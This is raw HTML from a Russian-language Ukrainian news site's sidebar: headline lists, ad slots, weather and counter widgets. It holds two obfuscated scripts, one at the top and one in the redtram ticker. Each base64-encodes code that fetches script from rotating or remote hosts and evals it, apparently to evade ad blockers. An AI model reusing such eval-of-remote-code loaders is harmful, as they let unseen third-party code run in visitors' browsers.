	  window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDY1NDMgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlNjU0My5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgc2NyaXB0X3NlY29uZCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9zZWNvbmQuc3JjID0gImh0dHBzOi8vIisgaG9zdCsiIjsgbm9kZTY1NDMucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChzY3JpcHRfc2Vjb25kKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTY1NDMuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjY1NDMiKSkgfSwgNTAwMCk7ICA7fTsg") );
  }
}
</script>
-->

	<div class="wiget simple_pr" style="margin:0 0 10px;display:block; position:relative;" id="theme_posts">
		
				  <div class="caption "> 
						<p>Новости экономики</p>
						<div class="popular-sort">
							<div class="sort"><a id="theme_31" onClick="getThemePopPosts(31, '4249,30426', 4249, 15)">месяц</a></div>
							<div class="sort"><a id="theme_7"style="text-decoration: underline;" onClick="getThemePopPosts(7, '4249,30426', 4249, 15)">неделю</a>&nbsp;&nbsp;|</div>				
							<div class="sort">популярные за&#160;&#160;<a id="theme_1" onClick="getThemePopPosts(1, '4249,30426', 4249, 15)">сутки</a>&nbsp;&nbsp;|</div>				
						</div>	
				  </div>
				  <div class="newsbody">
				  <h3 class="press"><a href="https://enovosty.com/news/news_economy/full/2906-getmancev-pogasil-prichinu-protestov-fopov-odnim-pismom">Гетманцев «погасил» причину протестов ФОПов одним письмом (1029)</a></h3><h3 class="press"><a href="https://enovosty.com/ekonomika/full/3006-tenevye-lobbisty-otrasli-drajvery-rosta-ekonomiki-ne-uchastvuyut-v-napolnenii-byudzheta">Теневые лоббисты: отрасли-драйверы роста экономики не участвуют в наполнении бюджета (1026)</a></h3><h3 class="press"><a href="https://enovosty.com/news/news_economy/full/207-ukraincy-dostayut-svoi-sberezheniya-traty-rezko-vyrosli">Украинцы достают свои сбережения. Траты резко выросли (938)</a></h3><h3 class="press"><a href="https://enovosty.com/news/news_economy/full/407-ukraina-zayavlyaet-o-shantazhe-so-storony-gazproma-sokrashhayushhego-postavki-gaza-v-evropu">Украина заявляет о "шантаже" со стороны Газпрома, сокращающего поставки газа в Европу (756)</a></h3><h3 class="press"><a href="https://enovosty.com/news/news_economy/full/107-eto-ne-rynok-zemli-a-zemelnyj-bazar-goncharenko-video">Это не рынок земли, а земельный базар, - Гончаренко (ВИДЕО) (460)</a></h3><h3 class="press"><a href="https://enovosty.com/news/news_economy/full/2906-stalo-izvestno-kak-anomalnaya-pogoda-povliyala-na-posevy-v-ukraine">Стало известно, как аномальная погода повлияла на посевы в Украине (447)</a></h3><h3 class="press"><a href="https://enovosty.com/news/news_economy/full/3006-stalo-izvestno-skolko-ukraincev-poluchaet-zarplatu-vyshe-15-000-griven">Стало известно, сколько украинцев получает зарплату выше 15 000 гривень (433)</a></h3><h3 class="press"><a href="https://enovosty.com/news/news_economy/full/207-konfety-roshen-vo-vsex-gosuchrezhdeniyax-strany-poxozhe-na-monopoliyu-araxamiya-video">Конфеты «Рошен» во всех госучреждениях страны - похоже на монополию, - Арахамия (ВИДЕО) (376)</a></h3><h3 class="press"><a href="https://enovosty.com/news/news_economy/full/3006-apple-otkryla-ofis-v-ukraine-pochemu-eto-tak-vazhno">Apple открыла офис в Украине. Почему это так важно? (338)</a></h3><h3 class="press"><a href="https://enovosty.com/news/news_economy/full/3006-stalo-izvestno-kogda-i-pri-kakix-usloviyax-ukraina-poluchit-transh-mvf">Стало известно, когда и при каких условиях Украина получит транш МВФ (278)</a></h3></div> 
	</div>



				<div class="mainarmiya">
			<p><a style="font-size: 17px;" href="https://enovosty.com/armiya">Армия</a></p>
			<table style="width:100%;">
				<tr>
									<td style="width:24%;">
						<div style="border:none; padding-top:3px;" id="post-4360511">
							<a href="https://enovosty.com/armiya/full/871-bronetransporter-btr-3u" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/05/btr_3u-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" loading="lazy" srcset="https://enovosty.com/wp-content/uploads/2014/05/btr_3u-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/05/btr_3u-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/05/btr_3u.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a>
							<a class="postTitle" href="https://enovosty.com/armiya/full/871-bronetransporter-btr-3u" >Бронетранспортер БТР-3У</a>
						</div>
					</td>
				 					<td style="width:24%;">
						<div style="border:none; padding-top:3px;" id="post-4412268">
							<a href="https://enovosty.com/armiya/full/441-protivotankovyj-raketnyj-kompleks-spike-izrail" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/12/PTRK_SPIKE-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" loading="lazy" srcset="https://enovosty.com/wp-content/uploads/2014/12/PTRK_SPIKE-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/12/PTRK_SPIKE-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/12/PTRK_SPIKE.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a>
							<a class="postTitle" href="https://enovosty.com/armiya/full/441-protivotankovyj-raketnyj-kompleks-spike-izrail" >Противотанковый ракетный комплекс Spike (Израиль)</a>
						</div>
					</td>
				 					<td style="width:24%;">
						<div style="border:none; padding-top:3px;" id="post-4460260">
							<a href="https://enovosty.com/armiya/full/463-tank-k1a1-yuzhnaya-koreya" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2015/07/k1a1-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" loading="lazy" srcset="https://enovosty.com/wp-content/uploads/2015/07/k1a1-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2015/07/k1a1-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2015/07/k1a1.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a>
							<a class="postTitle" href="https://enovosty.com/armiya/full/463-tank-k1a1-yuzhnaya-koreya" >Танк K1A1 (Южная Корея)</a>
						</div>
					</td>
				 					<td style="width:24%;">
						<div style="border:none; padding-top:3px;" id="post-4490381">
							<a href="https://enovosty.com/armiya/full/857-minomet-82-mm-verba" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2015/12/minomet_verba-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" loading="lazy" srcset="https://enovosty.com/wp-content/uploads/2015/12/minomet_verba-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2015/12/minomet_verba-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2015/12/minomet_verba.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a>
							<a class="postTitle" href="https://enovosty.com/armiya/full/857-minomet-82-mm-verba" >Миномет 82-мм «Верба»</a>
						</div>
					</td>
				 				</tr>
			 </table>
			 <a href="https://enovosty.com/armiya" class="allarmiya">Вся армия&nbsp;&nbsp;&nbsp;&nbsp;>></a>
		 </div>
	
				<div class="mainperson">
			<p><a style="font-size: 17px;" href="https://enovosty.com/person">Персоны</a></p>
			<table style="width:100%;">
				<tr>
									<td style="width:24%;">
						<div style="border:none; padding-top:3px;" id="post-4369301">
							<a href="https://enovosty.com/person/full/688-grojsman-vladimir" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2014/07/groysman-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" loading="lazy" srcset="https://enovosty.com/wp-content/uploads/2014/07/groysman-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/07/groysman.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a>
							<a class="postTitle" href="https://enovosty.com/person/full/688-grojsman-vladimir" >Гройсман<br /> Владимир</a>
						</div>
					</td>
				 					<td style="width:24%;">
						<div style="border:none; padding-top:3px;" id="post-4416906">
							<a href="https://enovosty.com/person/full/368-shevchenko-igor" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2014/12/shevchenko_ig-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" loading="lazy" srcset="https://enovosty.com/wp-content/uploads/2014/12/shevchenko_ig-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/12/shevchenko_ig.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a>
							<a class="postTitle" href="https://enovosty.com/person/full/368-shevchenko-igor" >Шевченко<br /> Игорь</a>
						</div>
					</td>
				 					<td style="width:24%;">
						<div style="border:none; padding-top:3px;" id="post-4457875">
							<a href="https://enovosty.com/person/full/687-gricak-vasilij" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2015/07/Gritsak-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" loading="lazy" srcset="https://enovosty.com/wp-content/uploads/2015/07/Gritsak-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2015/07/Gritsak.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a>
							<a class="postTitle" href="https://enovosty.com/person/full/687-gricak-vasilij" >Грицак<br /> Василий</a>
						</div>
					</td>
				 					<td style="width:24%;">
						<div style="border:none; padding-top:3px;" id="post-4522097">
							<a href="https://enovosty.com/person/full/351-omelyan-vladimir" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2016/04/omellyan-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" loading="lazy" srcset="https://enovosty.com/wp-content/uploads/2016/04/omellyan-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2016/04/omellyan.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a>
							<a class="postTitle" href="https://enovosty.com/person/full/351-omelyan-vladimir" >Омелян<br /> <br /> Владимир</a>
						</div>
					</td>
				 				</tr>
			 </table>
			 <a href="https://enovosty.com/person" class="allperson">Все персоны&nbsp;&nbsp;&nbsp;&nbsp;>></a>
		 </div>
	

<div class="wiget simple_pr" id="pop_posts">
	
			  <div class="caption"> 
					<div class="popular-sort-link"><a href="https://enovosty.com/novosti">Популярные новости</a></div>
					<div class="popular-sort">
						<div class="sort"><a id="pop_posts_31" onClick="getPopPosts(31)">месяц</a></div>
						<div class="sort"><a id="pop_posts_7" onClick="getPopPosts(7)">неделю</a>&nbsp;&nbsp;|</div>				
						<div class="sort">популярные за&#160;&#160;<a id="pop_posts_1" style="text-decoration: underline;" onClick="getPopPosts(1)">сутки</a>&nbsp;&nbsp;|</div>	
					</div>		
			  </div>
			  <div class="newsbody">
			  <p class="press"><a href="https://enovosty.com/news/news_incidents/full/407-rzhavye-konstrukcii-i-treshhiny-v-asfalte-kak-vyglyadit-avtovokzal-zapadnyj-v-okkupirovannom-donecke-foto">Ржавые конструкции и трещины в асфальте: как выглядит автовокзал "Западный" в оккупированном Донецке. ФОТО (4322)</a></p><p class="press"><a href="https://enovosty.com/news/news_sport/full/507-anglijskaya-pressa-raskritikovala-strannyj-postupok-yarmolenko-v-matche-evro-2020-video">Английская пресса раскритиковала "странный поступок" Ярмоленко в матче Евро-2020 (ВИДЕО) (3272)</a></p><p class="press"><a href="https://enovosty.com/uk/news-ukr/news-auto-ukr/full/407-ukrainskix-vodiiv-chekayut-velichezni-shtrafi-podrobici">Українських водіїв чекають величезні штрафи: подробиці (2891)</a></p><p class="press"><a href="https://enovosty.com/news/news_incidents/full/407-nardep-ot-slugi-naroda-evgenij-bragar-byl-zaderzhan-policiej-v-sostoyanii-narkoticheskogo-opyaneniya-foto">Нардеп от "Слуги народа" Евгений Брагар был задержан полицией в состоянии наркотического опьянения. ФОТО (2887)</a></p><p class="press"><a href="https://enovosty.com/news/news_incidents/full/507-poyavilos-video-potopa-v-rossijskom-sochi-mashiny-pod-vodoj-lyudi-plavayut-po-ulicam-fotovideo">Появилось видео затопления российского Сочи: машины под водой, люди плавают по улицам (ФОТО. ВИДЕО) (2776)</a></p><p class="press"><a href="https://enovosty.com/news/news_society/full/407-kurez-amerikancu-na-schet-po-oshibke-banka-zachislili-50-milliardov-dollarov-foto">Курьез: американцу на счет по ошибке банка зачислили 50 миллиардов долларов. ФОТО (2528)</a></p><p class="press"><a href="https://enovosty.com/news/news-culture/full/507-umer-oskaronosnyj-rezhisser-vladimir-menshov">Умер оскароносный режиссер Владимир Меньшов (1666)</a></p><p class="press"><a href="https://enovosty.com/news/news_politics/full/507-rossiya-gotovitsya-atakovat-ukrainu-butusov">Россия готовится атаковать Украину, - Бутусов (1607)</a></p><p class="press"><a href="https://enovosty.com/news/news_kiev/full/507-stoit-byt-ostorozhnymi-na-kievskom-plyazhe-zametili-skorpiona-foto">"Стоит быть осторожными": На киевском пляже заметили скорпиона (ФОТО) (1476)</a></p><p class="press"><a href="https://enovosty.com/news/news_incidents/full/407-potop-v-okkupirovannom-krymu-reki-vyshli-iz-beregov-video">Потоп в оккупированном Крыму: реки вышли из берегов (ВИДЕО) (1424)</a></p></div> 
</div>






</div>    
</div>
<style>#sidebarRight{margin-top:-227px;}</style>

<div id="sidebarRight"  >
<!-- begin right sidebar -->
<form method="get" id="searchform" action="https://enovosty.com/">
	<div class="search300">
        <input type="text" value="" name="s" id="s" />
        <input type="hidden" name="arh_title" value="on">
        <input type="hidden" name="arh_text" value="on">
        <input type="hidden" name="arh_news" value="on">
        <input type="hidden" name="arh_posts" value="on">
		<input type="submit" id="searchsubmit" value="Поиск" />
	</div>
</form>
<!-- inc banner c1 -->


		
<div class="wiget simple_pr socnet">
	<div class="caption"><p>Последние новости в соцсетях</p></div> 
	<table>
		<tr>
			<td><a href="https://www.facebook.com/enovosty/" rel="nofollow" target="_blank" class="facebook"><i></i></a></td>
			<td><a href="https://twitter.com/enovosty" rel="nofollow" target="_blank" class="twitter"><i></i></a></td>
							
			<td><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" rel="nofollow" target="_blank" class="you_tube"><i style="background: url(https://enovosty.com/wp-content/themes/eizvestia/img/You_Tube.png) no-repeat;"></i></a></td>	
			<td><a href="https://t.me/enovosty" rel="nofollow" target="_blank" class="telegram"><i style="background: url(https://enovosty.com/wp-content/themes/eizvestia/img/Telegram1_Obem1.png) no-repeat;"></i></a></td>
		</tr>
	</table>
</div>
	
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- enovosty_300_600 -->
<ins class="adsbygoogle"
	 style="display:inline-block;width:300px;height:600px"
	 data-ad-client="ca-pub-1008673670491634"
	 data-ad-slot="9027886280"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>

	<div class="wiget simple_pr" style="margin-top:5px;">
		<div class="caption"><div class="popular-sort-link"><a href="https://enovosty.com/publications">Публикации</a></div></div> 
				<p class="press"><a href="https://enovosty.com/publications/full/2603-problemy-reformy-zdravooxraneniya-pochemu-vrachi-massovo-uezzhayut-iz-ukrainy">Проблемы реформы здравоохранения: почему врачи массово уезжают из Украины</a></p>
				<p class="press"><a href="https://enovosty.com/publications/full/1606-kakie-avtomobili-potreblyayut-menshe-goryuchego-obzor-rynka">Какие автомобили потребляют меньше топлива: Обзор рынка</a></p>
		</div>
	
<!-- /59256651/enovosty_adint_300_600 -->
<div id='div-gpt-ad-1594112815543-0'>
  <script>
	googletag.cmd.push(function() { googletag.display('div-gpt-ad-1594112815543-0'); });
  </script>
</div>

</br>









<!-- pravdomer -->


<div id="adriver_banner_C3"></div>

	
 
	<div class="wiget simple_line infblogs"> 
		<div class="caption">
			<a href="https://enovosty.com/blogs">Мнения</a>
			<!-- <span class="postDate">01&nbsp;июня,&#160;2021</span> -->
		</div>
		<div class="block">
							<div class="cblock">
					<a href="https://enovosty.com/blogs/full/106-pyat-prichin-pochemu-ukrainu-ne-priglasili-na-sammit-nato"><img alt="Пять причин, почему Украину не пригласили на саммит НАТО" src="https://enovosty.com/wp-content/uploads/2021/06/original-112x67.jpg"><div>Константин Елисеев</div></a>
				</div>
						<p><a class="postTitle" href="https://enovosty.com/blogs/full/106-pyat-prichin-pochemu-ukrainu-ne-priglasili-na-sammit-nato">Пять причин, почему Украину не пригласили на саммит НАТО</a></p>
			<span class="postExcerpt"><a href="https://enovosty.com/blogs/full/106-pyat-prichin-pochemu-ukrainu-ne-priglasili-na-sammit-nato">Надо делать выводы</a></span>
		</div>
	</div>	



   
<!-- pr -->
<div class="wiget simple_pr" style="margin-top:5px;">
	<div>
		  
		 
			  <div class="caption"> 
					<div class="popular-sort-link"><a href="https://enovosty.com/novosti">Популярные новости</a></div>
					<div class="popular-sort">
						<div class="sort"><a id="pop_posts_31" onClick="getPopPosts(31)">месяц</a></div>
						<div class="sort"><a id="pop_posts_7" style="text-decoration: underline;" onClick="getPopPosts(7)">неделю</a>&nbsp;&nbsp;|</div>				
						<div class="sort">популярные за&#160;&#160;<a id="pop_posts_1" onClick="getPopPosts(1)">сутки</a>&nbsp;&nbsp;|</div>	
					</div>		
			  </div>
			  <div class="newsbody">
			  <p class="press"><a href="https://enovosty.com/news/news_abroad/full/2906-kurez-tureckie-voennye-nauchili-kotenka-marshirovat-video">Курьез: Турецкие военные научили котенка маршировать (ВИДЕО) (10470)</a></p><p class="press"><a href="https://enovosty.com/news/zdorove/full/2406-na-chuvstvo-yumora-zhara-ne-vliyaet-kak-ukraincy-shutyat-na-temu-anomalnoj-pogody">На чувство юмора жара не влияет: в Сети появились смешные фотожабы (8058)</a></p><p class="press"><a href="https://enovosty.com/news/news_sport/full/307-match-ukraina-angliya-v-seti-poyavilis-kureznye-fotozhaby">Матч Украина-Англия: в сети появились курьезные фотожабы (7799)</a></p></div>	</div>
</div>

	</br>

		<br>
	<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
	<!-- 300_c2 -->
	<ins class="adsbygoogle"
		 style="display:inline-block;width:300px;height:250px"
		 data-ad-client="ca-pub-1008673670491634"
		 data-ad-slot="6220472701"></ins>
	<script>
	(adsbygoogle = window.adsbygoogle || []).push({});
	</script>
	<br>
	
		
</br>
						

<!--		     
<div id="riainfo_e77f01cd5a912b7be06984da8aae869f" onclick="trackOutboundLink(this, 'AutoRia', 'auto.ria.com');"></div>
<br>
-->
<div id='go2net_6c64e1963fa943cf8c1efd800277f90c_zone_28808_sect_9220_site_7570' data-sender='go2net'></div>
<script type='text/javascript'>
	(window.globalAmlAds = window.globalAmlAds || []).push(function() {
globalAml.display('go2net_6c64e1963fa943cf8c1efd800277f90c_zone_28808_sect_9220_site_7570');
});
</script>
<br>



			

	<div id="pravdomer_info" style="margin-top:5px">
		<a href="https://besplatka.ua/ru/rabota" target="_blank">
		<img src="/wp-content/themes/eizvestia/img/BP_300x250_1.png" alt="работа на besplatka.ua">
		</a>  
	</div>
	<br>



<div id="redtram_news" onclick="trackOutboundLink(this, 'redtram_news', 'ru.redtram.com');">
	<div class="wiget simple"><div id="n4p_30546">
<script class="r36857" type="text/javascript">
    (function() {
        var worker36857,
            tickerID = 36857,
            tag = document.currentScript || (function() {
                var scripts = document.getElementsByClassName('r36857'),
                    len = scripts.length;
                return len ? scripts[len - 1] : null;
            })(),
            idn = (function() {
                var i, num, chars = "abcdefghiklmnopqrstuvwxyz",
                    len = Math.floor((Math.random() * 2) + 4),
                    idn = '';
                for (i = 0; i < len; i++) {
                    num = Math.floor(Math.random() * chars.length);
                    idn += chars.substring(num, num + 1);
                }
                return idn;
            })();
        
        var container = document.createElement('div');
            container.id = idn;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.setAttribute('class', 's36857');
            script.setAttribute('data-idn', idn);
            script.src = '//v1r7on.news/ru-n4p/0/36/ticker_36857.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9uNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';

                function runExternalMessage(data) {
                    worker36857.postMessage(data);
                }

                worker36857 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker36857.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker36857.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
</script>
</div></div> 
</div>




<br>
	<div>
		<a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" target="_blank">
			<img alt="Экономические новости youtube" width="300" height="250" src="https://enovosty.com/wp-content/themes/eizvestia/img/ENTV2_Svedenie.gif">
		</a>
	</div>

</br>





<!-- start NEW_right_v1 for enovosty.com -->
<div id="adpartner-jsunit-4125">
    <script type="text/javascript">
        var head = document.getElementsByTagName('head')[0];
        var script = document.createElement('script');
        script.type = 'text/javascript';
        script.src = "//a4p.adpartner.pro/jsunit?id=4125&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
        head.appendChild(script);
    </script>
</div>
<!-- end NEW_right_v1 for enovosty.com -->
</br>

		
<!-- Gismeteo informer START -->
<link rel="stylesheet" type="text/css" href="https://s1.gismeteo.ua/static/css/informer2/gs_informerClient.min.css">
<div id="gsInformerID-RpMlQd24Vh0i0g" class="gsInformer" style="width:300px;height:168px">
  <div class="gsIContent">
    <div id="cityLink">
        <a href="https://www.gismeteo.ua/weather-kyiv-4944/" title="Погода в Киеве" target="_blank">
            <img src="https://s1.gismeteo.ua/static/images/gisloader.svg" width="24" height="24" alt="Погода в Киеве">
        </a>
    </div>
    <div class="gsLinks">
     <table>
       <tr>
         <td>
           <div class="leftCol">
             <a href="https://www.gismeteo.ua" target="_blank" title="Погода">
               <img alt="Погода" src="https://s1.gismeteo.ua/static/images/informer2/logo-mini2.png" align="middle" border="0" height="16" width="11"/>
               <img src="https://s1.gismeteo.ua/static/images/gismeteo.svg" border="0" align="middle" style="left: 5px; top:1px">
             </a>
           </div>
           <div class="rightCol">
             <a href="https://www.gismeteo.ua/weather-kyiv-4944/14-days/" target="_blank" title="Погода в Киеве на 2 недели">
                <img src="https://s1.gismeteo.ua/static/images/informer2/forecast-2weeks.ru.svg" border="0" align="middle" style="top:auto" alt="Погода в Киеве на 2 недели">
             </a>
           </div>
           </td>
        </tr>
      </table>
    </div>
  </div>
</div>
<script src="https://www.gismeteo.ua/ajax/getInformer/?hash=RpMlQd24Vh0i0g" type="text/javascript"></script>
<!-- Gismeteo informer END -->

</br>

				<div>
					<a href="https://enovosty.com/finance/full/1906-obderut-na-prodazhe-kvartir-i-vydavyat-s-zemelnyx-nadelov" target="_blank" rel="noreferrer noopener">
						<img alt="Обдерут" src="/wp-content/uploads/2021/06/obderut.jpg">
					</a>
				</div>
			</br>
				<div id="help" style="margin-bottom: 15px;">
		<a href="https://dobro.ua/" target="_blank" rel="nofollow">
			<img style="width:300px;" src="/wp-content/themes/eizvestia/img/banner_subscribe_uk.png" alt="help">
		</a>
	</div>


<!--
<br>
	<div>
		<a href="https://enovosty.com/politika/full/502-vybory-2019-v-ocenkax-ekspertov-esli-ne-poroshenko-to-kto">
			<img alt="Выборы-2019 в оценках экспертов" src="https://enovosty.com/wp-content/themes/eizvestia/img/Vybory2.jpg">
		</a>
	</div>
<br>
-->


<!-- informer forum -->



<!-- HELP -->

<br>


<!--
<div id="help" style="margin-bottom: 15px;">
	<a href="https://ubb.org.ua/uk/project/5571/" target="_blank" rel="nofollow">
		<img style="width:300px;" src="/wp-content/themes/eizvestia/img/Dopomoga1.jpg" alt="help">
	</a>
</div>
<br>
-->






 


 
	
<!-- enovosty.com/news/news-markets/full/507-rossiya-zapretila-morozhenoe-gazirovku-i-yachmen-iz-ukrainy -->















	
	

	



<div class="wiget ukr_links" style="font-size:9px; color:#336699;"> 		
	
     </div>
	 
<!--LiveInternet counter--><script type="text/javascript">
document.write('<a href="//www.liveinternet.ru/click" '+
'target="_blank"><img src="//counter.yadro.ru/hit?t52.6;r'+
escape(document.referrer)+((typeof(screen)=='undefined')?'':
';s'+screen.width+'*'+screen.height+'*'+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+';u'+escape(document.URL)+
';h'+escape(document.title.substring(0,150))+';'+Math.random()+
'" alt="" title="LiveInternet: показане число переглядів і'+
' відвідувачів за 24 години" '+
'border="0" width="88" height="31"><\/a>')
</script><!--/LiveInternet-->
<br><br>



<!-- inc poll -->
<div class="links_bal" style="width:240px;">
		
</div>
	
<div class="links_bal" style="width:240px;">
<!-- putslinkshere -->
<!-- putslinkshere -->
</div>

 
<!-- inc banner d1 -->

   <!-- inc redtram.news -->




<div class="wiget ukr_links" style="font-size:9px; color:#336699;"> 
		</div>



<!--bigmir)net TOP 100 Part 2-->
</br>

<a style="margin-bottom:5px;display: inline-block;" href="https://www.bigmir.net/" target="_blank" onClick='img=new Image();img.src="//www.bigmir.net/?cl=101585";'><img src="//c.bigmir.net/?s101585&t8&l1" width="88" height="31" alt="bigmir)net TOP 100" title="bigmir)net TOP 100"></a>

<!--bigmir)net TOP 100 Part 2-->


<!-- end right sidebar -->
</div>

<!--</div> -->
<div class="cls"></div>

<script> 
  
  window.onload = function() { 
  
    // Delay to allow the async Google Ads to load
    setTimeout(function() { 
      
      // Get the first AdSense ad unit on the page
      var ad = document.querySelector("ins.adsbygoogle");
      
      // If the ads are not loaded, track the event
      if (ad && ad.innerHTML.replace(/\s/g, "").length == 0) {

        if (typeof ga !== 'undefined') {

            // Log an event in Universal Analytics
            // but without affecting overall bounce rate
            ga('send', 'event', 'Adblock', 'Yes', {'nonInteraction': 1}); 

        } else if (typeof _gaq !== 'undefined') {

            // Log a non-interactive event in old Google Analytics
            _gaq.push(['_trackEvent', 'Adblock', 'Yes', undefined, undefined, true]);

        }
      }
    }, 2000); // Run ad block detection 2 seconds after page load
  }; 
  
</script> <!-- sidebars -->

</div> <!-- id=body -->


<!-- start NEW_content_v1 for enovosty.com 
<div id="adpartner-jsunit-3430">
    <script type="text/javascript">
        var head = document.getElementsByTagName('head')[0];
        var script = document.createElement('script');
        script.type = 'text/javascript';
        script.src = "//a4p.adpartner.pro/jsunit?id=3430&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
        head.appendChild(script);
    </script>
</div>
 end NEW_content_v1 for enovosty.com -->


<!-- begin footer -->
<div class="cls"></div>
<br>
       <div id="footer">
        <div class="wiget text" style="padding-right:0; margin-right:0;" >
                <div id="bottom-menu" style="background: #F93; height:40px">
